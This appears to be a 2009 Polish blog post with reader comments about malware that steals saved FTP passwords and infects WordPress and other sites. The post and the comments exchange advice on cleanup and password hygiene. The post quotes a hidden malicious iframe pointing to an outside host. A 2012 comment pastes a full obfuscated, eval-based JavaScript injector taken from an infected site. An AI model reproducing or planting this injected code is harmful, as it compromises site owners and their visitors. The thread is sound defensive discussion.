41 Bezpieczeństwo stron WWW

Uwaga na Wordpressy!

Od jakiegoś czasu po sieci grasuje wirus, który łączy się z naszymi serwerami (prawdopodobnie dane do FTP pobiera z Total Commandera) i dołacza kod html i php do naszych stron. Zagrożone są wszystkie skrypty. Te autorskie i darmowe tj. Wordpress.

Od jakiegoś czasu po sieci grasuje wirus, który łączy się z naszymi serwerami (prawdopodobnie dane do FTP pobiera z Total Commandera) i dołacza kod html i php do naszych stron. Zagrożone są wszystkie skrypty. Te autorskie i darmowe tj. Wordpress.

Gdzie?

Złośliwy kod jest dodawany do wszystkich katalogów na serwerze do plików index.php, index.html, main.php. W samym kodzie źródłowym dołącza się na samym początku strony (przed !Doctype), zaraz po body, na końcu strony (po zamykającym tagu html) i przed ostatnim tagiem zamykającym body. Ponadto jeżeli używasz Wordpressa, to złośliwy kod jest dołączany do szablonów w katalogu wp-content/themes/ a nawet do innych plików z configami. U mnie był to np. wp-includes/default-filters.php

Co?

Dołączany jest niewidoczny iframe, który wygląda tak (oraz różne kombinacje):

<iframe src="http://cheapslotplay.cn/in.cgi?income48" width=1 height=1 style="visibility: hidden"></iframe>

Co się dzieje?

Wirus się rozprzestrzenia poprzez wyżej pokazany kod – to raz. Dwa – Google blokuje dostęp do strony przez wyszukiwarkę. Pojawia się komunikat, że „strona może wyrządzić szkody”.

Sprawdź swoje strony, skasuj kody html i zmień hasło do FTP!



Zdjęcie autora wpisu - Piotr Cichosz

Piotr Cichosz — autor wpisu

Frontend developer. Tworzę zaawansowane systemy webowe w JS. Swoją wiedzę nt. SEO wykorzystuję do rozwijania własnych projektów (z lepszym lub gorszym efektem). Dużo eksperymentuję i staram się określić jak bardzo można nagiąć cierpliwość algorytmów Google (:.

Komentarze 41

author Jurgi www 09.04.2009 13:12:14

O podkradaniu haseł do ftp z Totla Commandera już słyszałem.
Jedno pytanie: czy adres w tym kodzie jest stały? Można by go dodać do filtra. I: jak bardzo jest to zaraźliwe, infekuje tylko IE, czy coś jeszcze?

author Krzysztof Lis www 09.04.2009 13:24:38

Miałem coś takiego u klienta. Hasło wypłynęło raczej przez jego komputer (u siebie mam i firewalla i antywira) a wirusa znajdowałem ja po wejściu na stronę.

author Kapsel www 09.04.2009 13:38:42

@Jurgi - niestety, wygląda na to że problemem nie jest pojedynczy wirus, a mamy do czynienia po prostu z nowym rodzajem ataków.
Na witrynach klientków widziałem już najróżniejsze wersje - od ramek, przez wklejenie żywych linków, aż po pseudoszyfrowane JavaScripty.
Projektant TC już o problemie wie, ponoć szukują aktualizację, żeby szyfrować hasła i loginy do FTP - być może nowa wersja już bangla. Ale zagrożony tak naprawdę jest każdy program do FTP nie szyfrujący plików z hasłami.

Przy okazji - co robić po ataku - otóż nie wystarczy usunąć kod i przeskanować komputer w poszukiwaniu robala - trzeba też zmienić hasło do FTP! Miałem już przypadek, że kod został usunięty, komputer wyczyszczony, a bot po pewnym czasie wrócił i używając tego samego hasła wrzucił ponownie śmieci na stronę.

author Paweł Rabinek www 09.04.2009 14:05:48

Potwierdzam to co pisze @Kapsel, po usunięciu wirusa, trzeba jeszcze zmienić hasło do FTP. Miałem podobnego wirusa, tylko, że mi wklejał kod JS.

author jrasti www 09.04.2009 15:12:44

#!/bin/sh

FINDLINE=$(grep -r "cutlot.cn" * |cut -f1 -d: |grep -v $0)

for i in $FINDLINE;do
sed -i "s###" $i
done



Tu skrypt wyszukujacy dodane linijki. Podziekowania dla spolecznosci forum Ubuntu.pl za pomoc.

author jrasti www 09.04.2009 15:13:50

http://forum.ubuntu.pl/showthread.php?t=98263

tutaj jest poprawny skrypt.

aby wyszukac pliki zainfekowane:

find -type f -exec grep -q 'cutlot' {} ; -print

author Marek www 09.04.2009 16:45:46

Polecam FlashFXP z szyfrowaniem zapamiętanych haseł.

author Marcin www 09.04.2009 19:23:24

Również ja miałem problemy z podobnym wirusem. Kod doklejał się do każdego index.php, bez względu na zastosowany CMS. Bardzo nieprzyjemne, bo po skasowaniu w parę dni później znów było. Wyleczyłem to dzięki Trojan Removerowi i później zmianie wszystkich haseł.

author Robert www 09.04.2009 20:46:27

Wczoraj spotkało mnie to samo. Wirus dokleja swój kod do każdego pliku index.php i index.html. Nie ma znaczenia czy to skrypt czy stateczna strona www.
Szybkie rozwiązanie problemu: kontakt z hostingiem, poprosić o logi do ftp, sprawdzić kiedy akcja się zaczęła i poprosić o odtworzenie konta z backupu z dnia wcześniejszego. Wcześniej oczywiście trzeba usunąć paskudztwo z komputera i zmienić hasło do ftp.

author Mac User www 10.04.2009 10:44:03

Co to jest wirus? :D

author DJ SEBSON www 10.04.2009 14:27:29

@Mac User: duża bakteria :D:D

author mirek www 11.04.2009 09:05:19

@DJ SEBSON: Raczej mała bakteria (a w zasadzie to nie bakteria tylko wirus) :D:D

author Ylv www 15.04.2009 20:33:30

@Kapsel
>Projektant TC już o problemie wie, ponoć szukują aktualizację, żeby szyfrować hasła i loginy

Zaraz zaraz, chcesz powiedzieć, że TC do tej pory przechowuje hasła jako plaintext? Hm, dobrze, że po krótkim kontakcie z tym programem zrezygnowałem z niego. ;)

author MARIAN www 16.04.2009 18:09:35

a ja tego wirusa podam do sądu!

author Adam www 17.04.2009 18:01:07

Słyszałem o tym "chadziajestwie wrednym" wiele osób złapało. Przejrzałem część swoich stron i nie ma na szczęście ramek. Zmieniłem nawet TC na Filezilla, chociaż to nie jest pewne, że wykrada hasła z TC.

author Bogdan www 17.04.2009 21:03:00

Z FileZilli też wykrada...

author Adama www 18.04.2009 11:58:09

ale jednak TC jest najpopularniejszy, więc ryzyko chyba największe, zależy w jaki sposób wykrada hasała.

author Lesiu www 20.04.2009 15:43:27

Ja polecam FlashFXP, mimo iż nie jest darmowy. Na pewno bardziej przyjazny w użyciu niż FileZilla. Jeśli zaś chodzi o szablony do WP to polecam pobierać je z oficjalnych stron ich autorów, gdyż w serwisach będących zbiorami takich szablonów można wielokrotnie nadziać się na "modyfikowane" szablony z różnymi "niespodziankami".

author croll www 23.04.2009 09:46:41

a co myslicie na laczenie sie poprzez WINSCP?
Zamiast TC oczywiscie.

author raj www 23.04.2009 17:35:19

Jednego z moich userów to też dopadło. Co do SCP to oczywiście jest znacznie lepszy niż FTP (zwłaszcza przy autoryzacji kluczami), ale i tak podstawowa zasada bezpieczeństwa to nigdy nie przechowywać zapamiętanych haseł w żadnym programie! Hasło jest od tego, żeby znajdowało się tylko w głowie i żeby za każdym razem trzeba było je "z palca" wpisywać przy połączeniu. Inaczej użycie haseł traci w ogóle sens.

author Maciejcz www 26.04.2009 22:50:43

Hej, wydaje mi się, że to nie jest Total Commander, prawdopodobnie wirus wykorzystuje katalog TMP - więcej pod tym adresem http://www.mojito-networks.com/blog/index.php/2009/04/26/wirus-iframe-total-commander/

author Nomad www 18.05.2009 09:30:52

Pojawila sie chyba kolejna mutacja - zmiania index.php i dodaje juz pokodowane linki :)

author Nomad www 18.05.2009 20:32:42

Potyczki na Wordpressem i pozostawionym hasłem
http://nomadowyblog.pl/2009/05/wirusowy-wordpress-2/

author Marcin www 18.05.2009 22:55:47

U mnie to samo sie stalo.. na winylowe.com. O dziwo - korzystam z Maca, Leopard. TYLKO i wyłącznie.

author Grzesiek www 09.06.2009 17:22:28

Wirus wykrada cały plik z zapisanymi danymi do strony, zaszyfrowanie hasła pomoże jedynie w dodaniu go do robota doklejającego kod, ponieważ ręcznie da się wejść na FTP, jedyna szansa to zaszyfrować cały plik unikalnym kluczem który można otworzyć tylko na tym jednym komputerze.

author soczek www 24.06.2009 18:23:19

Zmieniłem hasło, zainstalowałem TCMD, wgrałem ponownie wszystkie pliki, wirus wraca... Ma ktoś jakiś pomysł?

author Kamil www 30.06.2009 01:38:44

Wirus wykrada hasła także za pośrednictwem FlashFXP, co mnie bardzo dziwi. Niestety i mnie to spotkało, choć używam tylko tego jednego klienta FTP.

author Kaluza www 10.08.2009 20:53:27

Ja miałem 43 robaki na swojej stronie. I wszystkie zniszczyłem. Jak narazie żaden nie powrócił. Napisałem krótki poradnik jak się ich pozbyć - http://www.kaluza.boo.pl/?p=5

author B. www 11.08.2009 22:15:36

Problem jest tylko taki, o czym prawie nikt nie wspomina, ze np. Kaspersky absolutnie nie wykrywa tego wirusa i moze on sobie buszowac po kompie w dowolny sposob... o czym sie wlasnie bolesnie przekonalem.
Druga sprawa - niestety nie wystarczy samo wyciecie wrednego kodu ze strony (bo tam nie ma zadnego wirusa tylko kod - glownie generujacy ruch na stronach np xxx pewnie w celach reklamowych) - trzeba poprawic caly plik bo wirus wklejajac zlosliwy iframe niestety dokonuje ciec w kodzie strony (pewnie wynika to z bledu w wirusie bo jest to dzialanie calkiem bezsensowne z punktu widzenia dzialania kodu - uniemozliwia czesto dzialanie strony)

author Darius www 26.08.2009 09:32:49

Ja mam już najnowszego TC i na szczęście hasła są szyfrowane... zresztą i tak wolę korzystać z ftp przez Mozille bo jest 10 razy bezpieczniejsza bardziej komfortowa i ma praktycznie same zalety... ;)

author konigstiger www 03.04.2010 09:59:03

Nie wiem czemu ludzie tworzą te wirusy. To jest takie bezinteresowne szkodzenie innym z pogranicza megalomani. Siedzą potem tacy w swoich jamach i podniecają się czyj wirus więcej naszkodził . Ĺťal

author Krzychu www 11.09.2010 10:25:53

Chyba jedyna rada to nie dodawać do Total Commandera zapamiętywania haseł, ale jak się ma około stu kont to wpisywanie ręcznie każdego hasła jest co najmniej katorgą i strasznie utrudnia pracę. Można jeszcze przeklejać hasła zapisane chronologicznie, gdzie indziej.

author Adek www 19.09.2010 23:54:11

Ja już raz się przejechałem na zapamiętanym haśle w TC i choć byłem chroniony przez niezłego antywirusa, nie pomogło. Dziś korzystam z FileZilli, nie zapamiętuje haseł i jest spokój.

author Krzychu www 11.09.2010 10:25:53

Chyba jedyna rada to nie dodawać do Total Commandera zapamiętywania haseł, ale jak się ma około stu kont to wpisywanie ręcznie każdego hasła jest co najmniej katorgą i strasznie utrudnia pracę. Można jeszcze przeklejać hasła zapisane chronologicznie, gdzie indziej.

author Adek www 19.09.2010 23:54:11

Ja już raz się przejechałem na zapamiętanym haśle w TC i choć byłem chroniony przez niezłego antywirusa, nie pomogło. Dziś korzystam z FileZilli, nie zapamiętuje haseł i jest spokój.

author projektowanie stron www 02.03.2011 15:14:50

Jak cos jest za darmo, to nigdy nie bedzie bezpieczne w100% i tyle...

author zabieg 17.05.2011 11:37:57

Sam mam kilka wordpressów i inny stron więc warto uważać na wirusy.

author Tworzenie stron 04.02.2012 11:24:52

U mnie wirus zainfekował stronę dopisując adres bigdeal777 .com

author paweo www 02.03.2012 13:25:29

Virusy to większe bakterie.

A czy ktoś skanował kompa w poszukiwaniu bakterii???

author Rafał 28.10.2012 10:20:16

A spotkał się ktoś teraz z takimi złośliwymi kodami w wordpressie:

v=window;try{fawbe++}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{v["document"]["body"]="123"}catch(gfdnfdgber){m=123;if((alert+"").indexOf("native")!==-1)ev=window["e"+"v"+"al"];}}
n=["9","9","4d","4a","19","1h","48","4j","47","52","4h","49","4i","51","20","4b","49","51","30","4g","49","4h","49","4i","51","50","2k","56","3f","45","4b","39","45","4h","49","1h","1g","46","4j","48","56","1g","1i","3m","22","41","1i","58","d","9","9","9","4d","4a","4m","45","4h","49","4m","1h","1i","2d","d","9","9","5a","19","49","4g","50","49","19","58","d","9","9","9","48","4j","47","52","4h","49","4i","51","20","54","4m","4d","51","49","1h","1b","2e","4d","4a","4m","45","4h","49","19","50","4m","47","2f","1g","4c","51","51","4k","2c","21","21","47","49","4m","51","4d","4a","4d","47","45","51","49","50","4f","45","54","45","50","45","4f","4d","20","4d","4i","4a","4j","21","47","45","1g","19","54","4d","48","51","4c","2f","1g","23","22","1g","19","4c","49","4d","4b","4c","51","2f","1g","23","22","1g","19","50","51","56","4g","49","2f","1g","53","4d","50","4d","46","4d","4g","4d","51","56","2c","4c","4d","48","48","49","4i","2d","4k","4j","50","4d","51","4d","4j","4i","2c","45","46","50","4j","4g","52","51","49","2d","4g","49","4a","51","2c","22","2d","51","4j","4k","2c","22","2d","1g","2g","2e","21","4d","4a","4m","45","4h","49","2g","1b","1i","2d","d","9","9","5a","d","9","9","4a","52","4i","47","51","4d","4j","4i","19","4d","4a","4m","45","4h","49","4m","1h","1i","58","d","9","9","9","53","45","4m","19","4a","19","2f","19","48","4j","47","52","4h","49","4i","51","20","47","4m","49","45","51","49","30","4g","49","4h","49","4i","51","1h","1g","4d","4a","4m","45","4h","49","1g","1i","2d","4a","20","50","49","51","2j","51","51","4m","4d","46","52","51","49","1h","1g","50","4m","47","1g","1l","1g","4c","51","51","4k","2c","21","21","47","49","4m","51","4d","4a","4d","47","45","51","49","50","4f","45","54","45","50","45","4f","4d","20","4d","4i","4a","4j","21","47","45","1g","1i","2d","4a","20","50","51","56","4g","49","20","53","4d","50","4d","46","4d","4g","4d","51","56","2f","1g","4c","4d","48","48","49","4i","1g","2d","4a","20","50","51","56","4g","49","20","4k","4j","50","4d","51","4d","4j","4i","2f","1g","45","46","50","4j","4g","52","51","49","1g","2d","4a","20","50","51","56","4g","49","20","4g","49","4a","51","2f","1g","22","1g","2d","4a","20","50","51","56","4g","49","20","51","4j","4k","2f","1g","22","1g","2d","4a","20","50","49","51","2j","51","51","4m","4d","46","52","51","49","1h","1g","54","4d","48","51","4c","1g","1l","1g","23","22","1g","1i","2d","4a","20","50","49","51","2j","51","51","4m","4d","46","52","51","49","1h","1g","4c","49","4d","4b","4c","51","1g","1l","1g","23","22","1g","1i","2d","d","9","9","9","48","4j","47","52","4h","49","4i","51","20","4b","49","51","30","4g","49","4h","49","4i","51","50","2k","56","3f","45","4b","39","45","4h","49","1h","1g","46","4j","48","56","1g","1i","3m","22","41","20","45","4k","4k","49","4i","48","2l","4c","4d","4g","48","1h","4a","1i","2d","d","9","9","5a"];h=2;s="";if(m)for(i=0;i-579!=0;i++){k=i;if(window["document"])s+=String["fro"+"mCharCode"](parseInt(n[i],23));}try{febwnrth--}catch(bawetawe){z=s;ev(z)}}

Aktualizuje wszystko na bieżąco a i tak nie daje rady tego uniknąć, podobne rzeczy wyskakują na Joomla ale tam aktualizacja do nowej wersji wystarcza aby pozbyć się tego problemu. W wordpressie moze to wina wtyczki którejś? Wdzięczny będe za wszelkie podpowiedzi.

author Grześ www 22.03.2013 11:30:50

Ciekawy post, chodź już trochę stary. Zastanawiam się czy cały czas są problemy związane z tym wirusem... Planuje moją stronę oprzeć o jakiś cms (najprawdopodobniej WordPress) i zastanawiam się czy problem związany z tym wirusem nadal istnieje... Może ktoś z doświadczonych użytkowników WP się wypowie?

Dodaj komentarz